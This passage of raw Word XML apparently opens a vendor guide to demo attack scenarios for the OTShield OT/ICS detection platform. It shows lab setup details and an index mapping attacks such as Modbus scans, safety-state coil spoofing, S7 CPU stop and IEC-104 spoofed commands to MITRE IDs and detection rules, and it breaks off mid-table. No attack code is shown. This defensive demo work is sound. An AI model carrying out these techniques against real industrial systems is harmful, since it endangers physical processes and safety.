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22"/>
        </w:rPr>
        <w:t>OTShield v1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Demo Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Reproducible adversary techniques for OT/ICS networks, mapped to OTShield detections</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2412"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AUDIENCE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOC / Blue Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2412"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>PROTOCOLS</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Modbus, S7Comm, IEC-104, DNP3, EtherNet/IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2412"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>FRAMEWORK</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2412"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>VERSION</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>v1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>How to read this document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Each scenario is a self-contained attack story you can run end-to-end against an OTShield instance, observe what the platform catches, and use as evidence in a customer or stakeholder demo. The scenarios follow the MITRE ATT&amp;CK for ICS kill chain order — reconnaissance, initial access, execution, lateral movement, ICS-specific impact — so you can present them as a continuous narrative or pick individual ones to highlight a single capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Every scenario uses the same five-block layout:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Threat overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — what the adversary is doing and why a defender should care.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Reproduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — exact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>scapy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tcpreplay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Python commands plus pcap layout. Copy-paste runnable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Expected OTShield detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the rule ID, severity, MITRE ID, and the precise UI path (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anomalies → Filter by rule:dpi.unauthorized_write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) where the analyst will find it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Impact narrative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — operational and safety consequences if the attack is not contained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Gap analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — variants OTShield does *not* yet catch, with a concrete capability item that would close the gap. These feed the product roadmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Lab assumptions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTShield backend running on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>localhost:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, frontend on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>localhost:3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab assets seeded so IPs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.1.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HMI, L2), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.2.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PLC, L1), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (field device, L0), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (engineering workstation, L3) exist with correct Purdue levels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">All pcaps are generated fresh, then either uploaded via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dashboard → Upload PCAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> or replayed live with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>tcpreplay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> against the capture interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Scenario index</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autofit"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OTShield rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus address-space scan (recon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0846</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.exception_response (burst)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-zone unauthorized write (IT → PLC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0855</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Coil-spoof to falsify safety state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0832</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write + (gap) value-baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rare diagnostic function code abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0858</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.rare_function_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7 STOP CPU — production halt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7Comm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0813</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write (S7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7 logic download (firmware/program push)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S7Comm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0843</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write + (gap) program-download rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IEC-104 General Interrogation sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IEC 60870-5-104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0846</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dpi.rare_function_code (per-RTU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IEC-104 spoofed C_SC_NA_1 single command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IEC 60870-5-104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0855</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(gap) IEC-104 control-direction rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNP3 unsolicited message flood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
